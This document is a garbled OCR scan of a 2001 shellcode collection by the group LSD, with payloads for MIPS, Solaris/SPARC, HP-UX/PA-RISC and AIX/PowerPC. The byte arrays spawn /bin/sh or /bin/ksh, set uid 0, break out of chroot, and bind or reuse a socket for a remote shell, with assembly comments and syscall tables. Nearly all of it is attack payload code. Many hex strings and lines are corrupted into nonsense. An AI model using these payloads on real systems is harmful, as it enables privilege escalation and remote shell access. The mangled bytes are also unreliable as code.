'\x24\x02\x04\x53" 


/* 


li 


$v0,1107 


*/ 


' \x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


'\x30\x44\xff\xff 


/* 


andi 


$a0, $v0, Oxffff 


*/ 


' \x23 \xe5 \xff\xf4 " 


/* 


addi 


$al, $ra,-12 


*/ 


•\x22\x26\xfe\xll" 


/* 


addi 


$a2, $sl, -(511-16) 


*/ 


'\x24\x02\x04\x42" 


/* 


li 


$v0,1090 


*/ 


' \x03 \xff\xff\xcc " 


/* 


syscall 




*/ 


' \x22 \x25 \xfe \x06" 


/* 


addi 


$al,$sl,-506 


*/ 


'\x24\x02\x04\x48" 


/* 


li 


$v0,1096 


*/ 


' \x03 \xff\xff\xcc " 


/* 


syscall 
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\x22\x26\xfe\x01" /* 

\x24\x02\x04\x41" /* 

\x03\xff\xff\xcc" /* 

\x02\x22\x98\x20" /* 

\x22\x32\xfe\x03" /* 

\x02\x40\x20\x25" /* 

\x24\x02\x03\xee" /* 

\x03\xff\xff\xcc" /* 

\x22\x64\xfe\x01" /* 

\x24\x02\x04\xll" /* 

\x03\xff\xff\xcc" /* 

\x22\x52\xff\xff" /* 

\x06\x41\xff\xf8" /* 



char jump[] = 

"\x03\xa0\xl0\x25" /* 
"\x03\xe0\x00\x08" /* 



idefine FINDSCKPORTOFS 30 
idefine BINDSCKPORTOFS 2 

iendif 



addi 


$a2, $sl,-511 


*/ 


li 


$v0,1089 


*/ 


syscall 




*/ 


add 


$s3, $sl,$vO 


*/ 


addi 


$s2, $sl,-509 


*/ 


move 


$a0, $s2 


*/ 


li 


$v0, 1006 


*/ 


syscall 




*/ 


addi 


$a0, $s3,-511 


*/ 


li 


$v0, 1041 


*/ 


syscall 




*/ 


addi 


$s2, $s2,-l 


*/ 


bgez 


$s2, <bindsckcode+92> 


*/ 


move 


$v0, $sp 


*/ 




$ra 


*/ 



Solaris/SPARC codes, file: sparc-solaris 



/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland 
/*## asmcodes for solar is 2.6 2.7 2.8 sparo 



*:// lsd-pl.net/ #*/ 
#*/ 



/* 

syscall 

exec 

exec 

setuid 

mkdir 

chroot 

chdir 

ioctl 

so_socket 

bind 

listen 

accept 

fcntl 

*/ 



%gl %o0, %ol, %o2, %o3, %o4 

xOOb ->path=" /bin/ksh" , -> [->a0=path, 0] 

xOOb ->path=" /bin/ksh" , -> [->a0=path, ->al="-c" , ->a2=cmd, 0] 
xOll uid=0 

x050 —>path="b . . ",mode= (each value is valid) 
x03d ->path={"b. . ", ". "} 
xOOc ->path=". . " 

x036 sfd, TI_GETPEERNAME=0x5491 ,-> [mlen=0x54 , len=0x54, ->sadr=[]] 
x0e6 AF__INET=2, SOCK_STREAM=2,prot=0, devpath=0 , S0V_DEFAULT=1 
x0e8 sfd, ->sadr=[0x33, 2, hi, lo, 0, 0, 0, 0] , len=OxlO, S0V_S0CKSTREAM=2 
x0e9 sfd,backlog=5, vers= (not required in this syscall) 
xOea sfd, 0, 0, vers= (not required in this syscall) 
x03e sfd, F_DUP2FD=0x09, fd= {0,1,2} 



iif defined(SPARC) && defined (SOLARIS) 



iifdef AB0VE_SPARCV8PLUS 










char shellcode[] = 


/* 


8*4+8 bytes 


*/ 


"\x9f\x41\x40\x01 " 


/* 


rd 


%pc, %o7 ! >= 


sparcv8+ */ 


" \x90 \x03 \xe0\x20" 


/* 


add 


%o7, 32, %o0 


*/ 


" \x92 \x02 \x20\xl0" 


/* 


add 


%o0,16, %ol 


*/ 


" \xc0 \x22 \x20\x08" 


/* 


st 


%g0, [%o0+8] 


*/ 


" \xd0 \x22 \x20\xl0" 


/* 


st 


%o0, [%o0+16] 


*/ 


" \xc0 \x22 \x20\xl4" 


/* 


st 


%g0, [%o0+20] 


*/ 


" \x82 \xl0\x20 \x0b " 


/* 


mov 


OxOb, %gl 


*/ 


"\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


"/bin/ksh " 











iendif 



shellcode [] = 


/* 


10*4+8 


bytes 


*/ 


\x20\xbf\xff\xff" 


/* 


bn, a 


<shellcode—4> 


*/ 


\x20\xbf\xff\xff" 


/* 


bn, a 


<shellcode> 


*/ 


\x7f\xff\xff\xff" 


/* 


cali 


<shellcode+4> 


*/ 


\x90\x03\xe0\x20" 


/* 


add 


%o7, 32, %o0 


*/ 


\x92\x02\x20\xl0" 


/* 


add 


%o0, 16, %ol 


*/ 


\xc0 \x22 \x20\x08" 


/* 


st 


%g0, [%o0+8] 


*/ 


\xd0\x22\x20\xl0" 


/* 


st 


%o0, [%o0+16] 


*/ 


\xc0\x22\x20\xl4" 


/* 


st 


%g0, [%o0+20] 


*/ 


\x82\xl0\x20\x0b" 


/* 


mov 


OxOb, %gl 
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"/bin/ksh ' 



cnar cntasne±j.coae li — 


/ * 


15*4+1 6+cmdlen bytes 


* / 


\x*lu \ xjd± \xrr \xrr 




bri, a 


<cmdshellcode—4> 


/ 


\x*lu \ xjd± \xrr \xrr 


/* 


bn, a 


<cmdshellcode> 




\x /x \xrr \xrr \xrr 


/ 


cali 


<cmdshellcode+4> 


/ 


"\ v Q/1 \ v/l 3 \ va/1 \ v"3A" 
\xyu \XUJ \XBU \Xj4 


/ 


add 


%o7, 52, %o0 


/ 


"\vQ9\v9"3\ va/1 \v9nn 

\xy^ \x/j \xei/ \x/u 




sub 


%o7, 32, %ol 


/ 


" \ va 9 \ v/l 9 \ v9/H v/1/^ " 




add 


%o0,12, %11 


* / 


"\xa4\x02\x20\xl0" 


/* 


add 


%o0,16, %12 


*/ 


\xcc/ \xza \xz\j \xua 




stb 


%g0, [%o0+8] 


/ 


"\xc0\x2a\x20\x0e " 


/* 


stb 


%g0, [%o0+14] 


*/ 


\xau \xzo \xrr \xeu 


/ 


st 


%o0, [%o7-32] 


/ 


\X6^ \x^: j) \xrr \X64 


/* 


st 


%11, [%o7-28] 


/ 


" \ va vf \ vO"3\ v^^\ v« O » 

\x64i \x/j \xrr \xeo 


/ 


st 


%12, [%o7-24] 


/ 


" \xcO \x23 \xf f \xec " 


/* 


st 


%g0, [%o7-20] 


*/ 


"Vvi39\v7/l\v9/l\ v/lK " 
\X0£ \X1 U \X*£L< \XUjD 


/* 

/ 


mov 


OxOb, %gl 




" \x91 \xdO \x20\x08" 


/* 


ta 


8 


*/ 


/ Din/ KSn C 










/* conuuaTid */ 










ch.3.3? setuìdcode li — 




3*4 bytes 


/ 


n\ v Q/l \ v/lQ \ v9/l \ v/l 7 » 

\Xj7l/ \XUo \x^u \xu± 




and 


%g0, 1, %o0 




" \ vQ 9\v7/l\v9/l\v7 7» 
\XoZ \X1 U \X^LS \ XI / 




mov 


Oxl 7, %gl 




" \ v 0 7 \ vW/1 \ v9/l \ v/l 13 " 
\Xj7j. \XUL/ \X£U \XUO 

/ 




ta 


8 




CÌ13.3? CÌÌJTOO'CCOae [i — 




20*4 bytes 




\x^u \xjdt \xrr \xrr 


/* 


bn, a 


<chrootcode-4> 


* / 


n\ v9/l\ vK^\ u- FF \ ir FF " 

\xzu \xjdz \xrr \xrr 


/ 


bn, a 


<chroot code> 


* / 


\x /x \xn \xrr \xrr 


/ 


cali 


<chrootcode+4> 


* / 


" \ yfl/l \ v/77 » 










a \ vs-*n \ «otti va n \ vfìQn 
\xcu \ xzo \xeu \xuo 




stb 


%g0, [%o7+8] 


/ 


a \ von\ v/i "3 \ v« n \ «/le » 

\xyu \xuj \xeu \xud 


/* 


add 


%o7, 5, %o0 




\XoA \x±u \xzu \xou 


/ 


mov 


0x50, %gl 




a \ v Q 7 \ vW/1 \ v9/l \ v/lfl » 
\XJ7J. \XUL/ \X^U \XUO 


/ 


ta 


8 


* / 


"\ v O/l \ v/l ? \ vo/1 \ v/l ^ " 

\xj7f \xl/»3 \xeu \xuo 




add 


%o7, 5, %o0 


/ 


" \x82 \xl0\x20 \x3d " 


/* 


mov 


0x3d, %gl 


*/ 


il \ v Q 7 \ vW/1 \ v9/l \ v/lG " 
\Xj7j. \XUL/ \X^U \XUO 




ta 


8 




" \xaa \x20 \x3f\xe0 " 


/* 


sub 


%g0, -32, %15 


*/ 


"\ v O/l \ v/l "3 \ va D \ v/l/T " 

\xyu \xuj \xeu \xuo 




add 


%o7, 6, %o0 




\XoZ \x±u \xzu \xuc 


Zie 


mov 


OxOc, %gl 


/ 


\Xdd \xoj \x /x \xrr 


/ * 


addcc 


%15,-1, %15 


*/ 


" \xl2 \xbf\xff\xfd " 


/* 


ble 


<chrootcode+48> 


*/ 


"\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


"\x90\x03\xe0\x07" 


/* 


add 


%o7, 7, %o0 


*/ 


" \x82 \xl 0 \x20 \x3d " 


/* 


mov 


0x3d, %gl 


*/ 


"\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


char findsckcode [] = 


/* 


35*4 bytes 


*/ 


" \x20 \xbf\xff\xff" 


/* 


bn, a 


<flndsckcode—4> 


*/ 


" \x20 \xbf\xff\xff" 


/* 


bn, a 


<findsckcode> 


*/ 


"\x7f\xff\xff\xff" 


/* 


cali 


<flndsckcode+4> 


*/ 



\x33\x02\xl2\x34" 
\xa0\xl0\x20\xff" 
\xa2\xl0\x20\x54" 
\xa4\x03\xff\xd0 " 
\xaa \x03 \xe0\x28" 
\x81\xc5\x60\x08" 
\xcO \x2b\xe0 \x04" 
\xe6\x03\xff\xd0 " 
\xe8 \x03 \xe0\x04" 
\xa8\xa4\xc0\xl4 " 
\x02 \xbf\xff\xfb " 
\xaa \x03 \xeO \x5c " 
\xe2 \x23 \xff\xc4 " 
\xe2 \x23 \xff\xc8 " 
\xe4 \x23 \xff\xcc " 
\x90\x04\x20\x01 " 
\xa7\x2c\x60\x08" 
\x92\xl4\xe0\x91 " 
\x94\x03\xff\xc4 " 
\x82\xl0\x20\x36" 



/* mov 
/* mov 
/* add 
/* add 
/* jmp 
/* stb 
/* ld 
/* ld 
/* subcc 
/* bz 
/* add 
/* st 
/* st 
/* st 
/* add 
/* sii 
/* or 
/* add 
/* mov 



Oxff, %10 
0x54, %11 
%o7,-48, %12 
%o7, 40, %15 
%15+8 

%g0, [%o7+4] 
[%o7-48], %13 
[%o7+4], %14 
%13, %14, %14 
<flndsckcode+32> 
%o7, 92, %15 
ili, [%o7-60] 
%11, [%o7-56] 
%12, [%o7-52] 
%10,1, %o0 
%11, 8, %13 
%13, 0x91, %ol 
%o7,-60, %o2 
0x36, %gl 



*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
*/ 
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\xla \xbf\xff\xfl " 


/* 


bcc 


<flndsckcode+36> 


*/ 


\xa0\xa4\x20\x01 " 


/* 


deccc 


%10 


*/ 


\xl2 \xbf\xff\xf5 " 


/* 


bne 


<flndsckcode+60> 


*/ 


\xa6\xl0\x20\x03" 


/* 


mov 


0x03, %13 


*/ 


\x90 \x04\x20 \x02 " 


/* 


add 


ilO, 2, %o0 


*/ 


\x92\xl0\x20\x09" 


/* 


mov 


0x09, %ol 


*/ 


\x94 \x04 \xff\xff" 


/* 


add 


%13,-1, %o2 


*/ 


\x82\xl0\x20\x3e " 


/* 


mov 


0x3e, %gl 


*/ 


\xa6\x84\xff\xff" 


/* 


addcc 


%13,-1, %13 


*/ 


\xl2 \xbf\xff\xfb " 


/* 


bne 


<findsckcode+112> 


*/ 


\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


bindsckcode [] = 


/* 


34*4 bytes 


*/ 


\x20\xbf\xff\xff" 


/* 


bn, a 


<blndsckcode—4> 


*/ 


\x20\xbf\xff\xff" 


/* 


bn, a 


<blndsckcode> 


*/ 


\x7f\xff\xff\xff" 


/* 


cali 


<blndsckcode+4> 


*/ 


\x33\x02\xl2\x34" 










\x90\xl0\x20\x02 " 


/* 


mov 


0x02, %o0 


*/ 


\x92\xl0\x20\x02 " 


/* 


mov 


0x02, %ol 


*/ 


\x94\x08\x20\x01 " 


/* 


and 


%g0, 1, %o2 


*/ 


\x96\x08\x20\x01 " 


/* 


and 


%g0, 1, %o3 


*/ 


\x98\xl0\x20\x01 " 


/* 


mov 


0x01, %o4 


*/ 


\x82\xl0\x20\xe6" 


/* 


mov 


0xe6, %gl 


*/ 


\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


\xa2 \x22 \x3f\xff" 


/* 


sub 


%o0,-l, ili 


*/ 


\xc0\x23\xe0\x08" 


/* 


st 


%g0, [%o7+8] 


*/ 


\x92\x03\xe0\x04" 


/* 


add 


%o7,4, %ol 


*/ 


\x94\xl0\x20\xl0" 


/* 


mov 


0x10, %o2 


*/ 


\x96\xl0\x20 \x02 " 


/* 


mov 


0x02, %o3 


*/ 


\x82 \xl0\x20\xe8" 


/* 


mov 


0xe8, %gl 


*/ 


\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


\x90\x04\x7f\xff" 


/* 


add 


%11,-1, %o0 


*/ 


\x92 \xl0\x20 \x05 " 


/* 


mov 


0x05, %ol 


*/ 


\x82\xl0\x20\xe9" 


/* 


mov 


0xe9, %gl 


*/ 


\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


\x90\x04\x7f\xff" 


/* 


add 


%11,-1, %o0 


*/ 


\x92 \x08\x20 \x01 " 


/* 


and 


%g0, 1, %ol 


*/ 


\x94\x08\x20\x01 " 


/* 


and 


%g0, 1, %o2 


*/ 


\x82 \xl0\x20 \xea " 


/* 


mov 


Oxea, %gl 


*/ 


\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


\xa6\xl0\x20\x03" 


/* 


mov 


0x03, %13 


*/ 


\x92\xl0\x20\x09" 


/* 


mov 


0x09, %ol 


*/ 


\x94 \x04 \xff\xff" 


/* 


add 


%13,-1, %o2 


*/ 


\x82\xl0\x20\x3e " 


/* 


mov 


0x3e, %gl 


*/ 


\xa6\x84\xff\xff" 


/* 


addcc 


%13,-1, %13 


*/ 


\xl2 \xbf\xff\xfc " 


/* 


bne 


<blndsckcode+112> 


*/ 


\x91\xd0\x20\x08" 


/* 


ta 


8 


*/ 


jump[] = 










\x81 \xc3 \xe0\x08" 


/* 


jmp 


%o7+8 


*/ 


\x90\xl0\x00\x0e " 


/* 


mov 


%sp, %o0 


*/ 



idefine FINDSCKPORTOFS 
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HP-UX/PA-RISC codes, file: parisc-hpux 



/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland 
/*## asmcodes for hp-ux 10.20 parisc 



*:// lsd-pl.net/ #*/ 
#*/ 



/* 

syscall 



%r22 %r26, %r25, %r24, %r23 



execv xOOb ->path=" /bin/sh" , 0 

execv xOOb ->path=" /bin/sh" ,-> [->aO=path, ->al="-c", ->a2=cmd, 0] 

setresuid x07e 0, 0, 0 

mkdir x088 —>path= " a . . " , mode= (each value is valid) 

chroot x03d ->path={ "a . . ", ". "} 

chdir xOOc —>path=". . " 

etpeername xll6 sfd,->sadr=[],->[OxlO] 
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bind xll4 sfd,->sadr=[0x61,2,hi,lo,0,0,0,0] ,len=OxlO 

listen xll9 sfd, backlog=5 

accept xll3 sfd, 0, 0 

dup2 x05a sfd, fd={0, 1, 2} 

*/ 



iif defined(PARISC) SS defined(HPUX) 



chair siieUcodG [ ] — 




7*4+8 bytes 


* / 


" V K\v<!f\v1 -F \ v -Fri " 




bl 


<shellcode+4> , %r26 


* / 


\xujD \xu^ \xyy 




xor 


%r25, %r25, %r25 


* / 


\ XxJ / \XJd \X*iU \XZZ 




addi, < 


Oxll, %r26, %r26 


/ 


\xlt \x^fi/ \xiz \xue 




stbs 


%r0, 7(%r26) 


* / 


\X^L/ \X^£U \XUO \XUJ. 




ldil 


L%0xc0000004, %rl 




\xe4i \x^u \xeu \xuo 




ble 


R%0xc0000004 (%sr7, %rl) 


*/ 


\Xx?4 \ XI 0 \X / 1/ \ XI 0 




addi, > 


Oxb, %r0, %r22 


/ 


/ JDJ.I1/ SU 










cii3.iT cmdsheJ. 1 code [ ] — 




14*4+12+cmdlen bytes 


/ 


"\xeb\x5f \xlf \xfd" 


/* 


bl 


<cmdshellcode+4>, %r26 


*/ 


\X^L/ \X^L/ \X(/o \X(/1 


/* 

/ 


ldil 


L%0xc0000004, %rl 




"\xb7\x5a\x40\x5a " 


/* 


addi, < 


0x2d, %r26, %r26 


*/ 


" \ vK7 \ Vii /il v f /l'I 

\XjD / \Xj 0 \X*f 1/ \X± U 




addi, < 


0x8, %r26, ir22 


/ 


" \ vK7 \ ^ \ v A H \ v 7 G " 
\ XjD / \X33 \X4 1/ \ XI o 




addi, < 


Oxc, ir 26, %r21 


/ 


\xlt \x*±\j \xiz \xus 




stbs 


%r0, 0x7(%r26) 




\XUJ. \X4L/ \X1Z \X14 




stbs 


%r0, Oxa (ir 2 6) 




\xdjD \xj3 \xjì \xyy 




stw 


%r26, -0x34 (%r26) 




\ X DjD \ XJ D \ XJ X \ Xd J. 




stw 


%r22, -0x30 (%r26) 


/ 


"\x6h\x55\x3f\xa9" 




stw 


%r21,-0x2c(%r26) 


*/ 


" \x6b\x40\x3f\xbl " 


/* 


stw 


%r0, -0x28 (%r26) 


*/ 


"\xb7\x59\x47\x99" 


/* 


addi, < 


-0x34, %r26, %r25 


*/ 


" \xe4 \x20 \xeO \x08 " 


/* 


ble 


R%0xc0000004 (%sr7, %rl) 


*/ 


"\xb4\xl6\x70\xl6" 


/* 


addi, > 


OxOb, %r0, %r22 


*/ 


"/bin/sh -c " 










/ * comma nd */ 










char setresuidcode [ ] = 


/* 


6*4 bytes 


V 


" \x0b\x5a \x02 \x9a " 


/* 


xor 


%r26, %r26, %r26 


*/ 


"\x0b\x39\x02\x99" 


/* 


xor 


%r25, %r25, %r25 


*/ 


"\x0b\xl8\x02\x98" 


/* 


xor 


%r24, %r24, %r24 


*/ 


"\x20\x20\x08\x01 " 


/* 


ldil 


L%0xc0000004, %rl 


*/ 


" \xe4 \x20 \xeO \x08 " 


/* 


ble 


R%0xc0000004 (%sr7, %rl) 


*/ 


" \xb4 \xl6\x70 \xfc " 


/* 


addi , > 


0x7e, %r0, %r22 


*/ 



chrootcode [ ] = 


/* 


24*4 bytes 


*/ 


\xb4\xl7\x40\x04" 


/* 


addi, < 


0x2, %r0, %r23 


*/ 


\xeb\x57\x40\x02 " 


/* 


blr,n 


%r23, ir 26 


*/ 


\x20\x20\x08\x01 " 


/* 


ldil 


L%0xc0000004, %rl 


*/ 


\xe4\x20\xe0\x08 " 


/* 


ble 


R%0xc0000004 (%sr7, %rl) 


*/ 


\x0a\xf7\x02\x97" 


/* 


xor 


%r23, %r23, %r23 


*/ 


\xe8 \x40\xc0 \x02 " 


/* 


bv, n 


0 (%rp) */ 




\x61 \x2e \x2e \x2e " 


/* 


a. . . 




*/ 


\xb7\x5a\x40\xl2" 


/* 


addi, < 


0x9, ir 26, %r26 


*/ 


\x08\xla\x06\x0c" 


/* 


add 


%r26, %r0, %rl2 


*/ 


\x0d\x80\xl2\x06" 


/* 


stbs 


%r0, 0x3 (%rl2) 


*/ 


\xe8\x5f\xlf\xad" 


/* 


bl 


<chrootcode+4> , %rp 


*/ 


\xb4\xl6\x71\xl0" 


/* 


addi, > 


0x88, %r0, %r22 


*/ 


\x08\x0c\x06\xla" 


/* 


add 


%rl2, %r0, %r26 


*/ 


\xe8\x5f\xlf\x95 " 


/* 


bl 


<chrootcode+4> , %rp 


*/ 


\xb4\xl6\x70\x7a" 


/* 


addi, > 


0x3d, %r0, %r22 


*/ 


\xb4\x0d\x01\xfe" 


/* 


addi 


Oxff, %r0, %rl3 


*/ 


\xb5\x9a\x40\x02 " 


/* 


addi, < 


Oxl, %rl2, %r26 


*/ 


\xe8\x5f\xlf\x75" 


/* 


bl 


<chrootcode+4> , %rp 


*/ 


\xb4\xl6\x70\xl8" 


/* 


addi, > 


Oxc, %r0, %r22 


*/ 


\x88\x0d\x3f\xdd" 


/* 


combf, = 


%rl3, %r0, <chrootcode+64> * 


\xb5\xad\x07\xff" 


/* 


addi 


-Oxl, %rl3, %rl3 


*/ 


\xb5\x9a\x40\x04" 


/* 


addi, < 


0x2, %r!2, %r26 


*/ 


\xe8\x5f\xlf\x4d" 


/* 


bl 


<chrootcode+4> , %rp 


*/ 


\xb4\xl6\x70\x7a" 


/* 


addi, > 


0x3d, %r0, %r22 


*/ 



char findsckcode [ ] = 

"\xe9\x9f \xlf \xfd" 



/* 30*4 bytes */ 
/* bl <findsckcode+4>, %r!2 */ 
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"\xb4\x0e\x01\xde" 


/* 


addi 


Oxef, %r0, %rl4 


*/ 




"\xb5\x98\x07\xd3" 


/* 


addi 


-0x17, %r!2, %r24 


*/ 




"\xb5\x99\x07\xdb" 


/* 


addi 


-0x13, %r!2, %r25 


*/ 




"\x08\x0e\x06\xla" 


/* 


add 


%rl4, %r0, %r26 


*/ 




"\x20\x20\x08\x01 " 


/* 


ldil 


L%0xc0000004, %rl 


*/ 




"\xe4\x20\xe0\x08" 


/* 


ble 


R%0xc0000004 (%sr7, %rl) 


*/ 




" \xb4 \xl6\x02 \x2c " 


/* 


addi 


0x116, %r0, %r22 


*/ 




"\x80\xlc\x20\x20" 


/* 


comb, = 


%retO, %r0, <findsckcode+60> 


*/ 


" \xOb\xl 8 \x02 \x98 " 


/* 


xor 


%r24, %r24, %r24 


*/ 




" \xb5 \xce \x0 7\xff" 


/* 


addi 


-Oxl, ir 14, ir 14 


*/ 




"\x88\x0e\x3f\xad" 


/* 


combf, = 


%rl4, %r0, <findsckcode+12> 


*/ 


" \xOb\xl 8 \x02 \x98 " 


/* 


xor 


%r24, %r24, %r24 


*/ 




"\x61\x61\xl2\x34" 












"\xb5\x99\x06\x3f" 


/* 


addi 


-Oxel, %rl2, %r25 


*/ 




" \x4 7\x2f\x02 \x20" 


/* 


ldh 


0x110 (%r25) ,%rl5 


*/ 




"\x45 \x90 \x3f\xdf" 


/* 


ldh 


-Oxll (%r!2) , %rl6 


*/ 




" \x82 \x0f\x20 \xlO" 


/* 


comb, = 


%rl5, %r!6, <findsckcode+88> 


*/ 


" \xOb\xl 8 \x02 \x98 " 


/* 


xor 


%r24, %r24, %r24 


*/ 




"\x8a\x0f\x3f\x6d" 


/* 


combf, = 


%rl5, %r!6, <findsckcode+12> 


*/ 


" \xb5 \xce \x0 7\xff" 


/* 


addi 


-Oxl, %rl4, %rl4 


*/ 




" \xb4 \x0f\x40\x04 " 


/* 


addi, < 


0x2, %r0, %rl5 


*/ 




"\x08\x0e\x06\xla" 


/* 


add 


%rl4, %r0, %r26 


*/ 




" \x08 \x0f\x06\xl9" 


/* 


add 


%rl5, %r0, %r25 


*/ 




"\x20\x20\x08\x01 " 


/* 


ldil 


L%0xc0000004, %rl 


*/ 




"\xe4\x20\xe0\x08" 


/* 


ble 


R%0xc0000004 (%sr7, %rl) 


*/ 




" \xb4 \xl6\x70 \xb4 " 


/* 


addi, > 


0x5a, %r0, %r22 


*/ 




"\x88\x0f\x3f\xcd" 


/* 


combf, = 


%rl5, %r0, <findsckcode+92> 




"\xb5\xef\x07\xff" 


/* 


addi 


-Oxl, %rl5, %rl5 


*/ 




char bindsckcode[] = 


/* 


37*4 bytes 


*/ 




n \xb4\xl7\x40\x04" 


/* 


addi, < 


0x2, %r0, %r23 


*/ 




"\xe9\x97\x40\x02 " 


/* 


blr, n 


%r23, %rl2 


*/ 




"\x20\x20\x08 \x01 " 


/* 


ldil 


L%0xc0000004, %rl 


*/ 




"\xe4\x20\xe0\x08" 


/* 


ble 


R%0xc0000004 (%sr7, %rl) 


*/ 




" \xOa \xf7\x02 \x97" 


/* 


xor 


%r23, %r23, %r23 


*/ 




"\xe8 \x40\xc0 \x02 " 


/* 


bv, n 


0 (%rp) 


*/ 




"\x61 \x02 \x23 \x45" 












"\xb4\xla\x40\x04 " 


/* 


addi, < 


0x2, %r0, %r26 


*/ 




"\xb4\xl9\x40\x02 " 


/* 


addi, < 


Oxl, %r0, %r25 


*/ 




" \xOb\xl 8 \x02 \x98 " 


/* 


xor 


%r24, %r24, %r24 


*/ 




"\xe8 \x5f\xlf\xad " 


/* 


bl 


<bindsckcode+4> , %rp 


*/ 




n \xb4\xl6\x72\x44" 


/* 


addi, > 


0x122, %r0, %r22 


*/ 




"\x08\xlc\x06\x0d" 


/* 


add 


%retO, %r0, %rl3 


*/ 




"\xb5\x8c\x40\xl0" 


/* 


addi, < 


0x8, %rl2, %rl2 


*/ 




" \xb4 \xl8\x40\x20" 


/* 


addi, < 


0x10, %r0, %r24 


*/ 




"\x08\x0d\x06\xla" 


/* 


add 


%rl3, %r0, %r26 


*/ 




"\x0d\x80\xl2\x8a " 


/* 


stw 


%r0, 0x5 (%rl2) 


*/ 




" \xb5 \x99\x40\x02 " 


/* 


addi, < 


Oxl, %rl2, %r25 


*/ 




"\xe8 \x5f\xlf\x6d " 


/* 


bl 


<bindsckcode+4> , %rp 


*/ 




"\xb4\xl6\x72\x28" 


/* 


addi, > 


0x114, %r0, %r22 


*/ 




"\x08\x0d\x06\xla" 


/* 


add 


%rl3, %r0, %r26 


*/ 




"\xb4\xl9\x40\x02 " 


/* 


addi, < 


Oxl, %r0, %r25 


*/ 




"\xe8 \x5f\xlf\x4d" 


/* 


bl 


<bindsckcode+4> , %rp 


*/ 




"\xb4\xl6\x72\x32 " 


/* 


addi, > 


0x119, %r0, %r22 


*/ 




"\x08\x0d\x06\xla" 


/* 


add 


%rl3, %r0, %r26 


*/ 




"\x0b\x39\x02\x99" 


/* 


xor 


%r25, %r25, %r25 


*/ 




" \xOb\xl 8 \x02 \x98 " 


/* 


xor 


%r24, %r24, %r24 


*/ 




"\xe8\x5f\xlf\x25" 


/* 


bl 


<bindsckcode+4> , %rp 


*/ 




"\xb4\xl6\x72\x26" 


/* 


addi, > 


0x113, %r0, %r22 


*/ 




" \xb4 \xOe \x40\x04 " 


/* 


addi, < 


0x2, %r0, ir 14 


*/ 




"\x08\xlc\x06\x0c" 


/* 


add 


iretO, %r0, %rl2 


*/ 




" \x08 \x0c\x06\xla " 


/* 


add 


%rl2, %r0, %r26 


*/ 




"\x08\x0e\x06\xl9" 


/* 


add 


%rl4, %r0, %r25 


*/ 




"\xe8 \x5f\xle \xf5 " 


/* 


bl 


<bindsckcode+4> , %rp 


*/ 




" \xb4 \xl6\x70 \xb4 " 


/* 


addi, > 


0x5a, %r0, %r22 


*/ 




"\x88 \xOe \x3f\xd5 " 


/* 


combf, = 


%rl4, %r0, <bindsckcode+124> 


*/ 


"\xb5\xce\x07\xff" 

r 


/* 


addi 


-Oxl, %rl4, %rl4 


*/ 




char jump[] = 












"\xe0\x40\x00\x00" 


/* 


be 


0x0 (%srO, %rp) 


*/ 




"\x37\xdc\x00\x00" 


/* 


copy 


%sp, iretO 


*/ 




gdefine FINDSCKPORTOFS 


58 
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AIX/POWER/PowerPC codes, file: powerpc-aix 



/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland 
/*## asmcodes for aix 4.1 4.2 4.3 power /powerpc 

/* 

syscall %r2 %r2 %r2 %r3, %r4, %r5 


*://lsd-pl 


■net/ #*/ 
#*/ 


execve x003 x002 x004 


->path="/b 


in/sh" ,-> [->aO=path, 0] ,0 




execve x003 x002 x004 


->path="/b. 


in/sh", ->[->aO=path, ■ 


->al="-c" ,->a2-. 


=cmd, 0] ,0 


seteuid x068 xOll x082 


euid=0 








mkdir xOlf x08e xOaO 


->path="t. 


. ",mode= (each value 


is valid) 




chroot x06f x078 x089 


->path={"t 


■ ■ "■ "} 






chdir x06d x076 x087 


->path=". . 


ii 






getpeername x041 x046 x053 


sfd, ->sadr 


= [],-> [len=0x2c] 






socket x057 x05b x069 


AF_ 


_INET=2, 


S0CK_STREAM=1 , prot =0 






bind x056 x05a x068 


sfd, ->sadr 


= [0x2c, 0x02, hi, lo, 0, i 


0, 0, 0] , len=0xl0 


listen x055 x059 x067 


sfd, backlog=5 






accept x053 x058 x065 


sfd, 0, 0 








dose x05e x062 x071 


fd- 


= {0,1,2} 








kfcntl x0d6 x0e7 xOfc 


sfd, F_DUPFD=0, fd={0, 1,2} 






v4.1 v4.2 v4.3 












*/ 












iif de fined (POWERPC) 44 defined(AIX) 








L/Jdx Siici ICOQe l J — 




12*4+8 bytes 


*/ 




" \x7c\xa5 \x2a \x79 " 




xor. 


r5, r5, r5 


*/ 




\A'±\J \JiO£à \JiJ-J- 




bnel 


<shellcode> 


*/ 




»\ Y 7f \ ypOl yD9\ va fi" 
\ A / X \ACU \ A(/£ \ A Ci D 




mflr 


r31 


*/ 




"\x3jb\xff \x£?l \x20 " 




cai 


r31, 0x120 (r31) 


*/ 




"\y?/?\v7f \ yff \ vflfl " 

\ A _> O \ A I J- lAii \AuO 


/* 


cai 


r3, -248 (r31) 


*/ 




"\ v"?fl\ vQf \ vff \ vi 0" 

(aJO \A^X \AXX ( Al U 




cai 


r4,-240 (r31) 


*/ 




\ a -s v \ a / x \ ax x \ ax ty 




st 


r3,-240 (r31) 


*/ 




" \x90 \xbf\xff\xl 4 " 


/* 


st 


r5,-236(r31) 


*/ 




"\x88 \x5f\xff\x0f" 


/* 


lbz 


r2, -241 (r31 ) 


*/ 




" \x98 \xbf\xff\xOf" 


/* 


stb 


r5, -241 (r31 ) 


*/ 




"\x4c\xc6\x33\x42" 


/* 


crorc 


cr6, cr6, cr6 


*/ 




" \x44 \xff\xff\x02 " 


/* 


svca 




*/ 




"/bin/sh " 












iifdef V41 












"\x03" 












iendif 












iifdef V42 












"\x02 " 












iendif 












iifdef V43 












"\x04" 












iendif 












char setreuidshellcode [ ] = 


/* 


19*4+7 bytes 


*/ 




"\x7e\x94\xa2\x79" 


/* 


xor. 


r20, r20, r20 


*/ 




" \x40\x82 \xff\xfd " 


/* 


bnel 


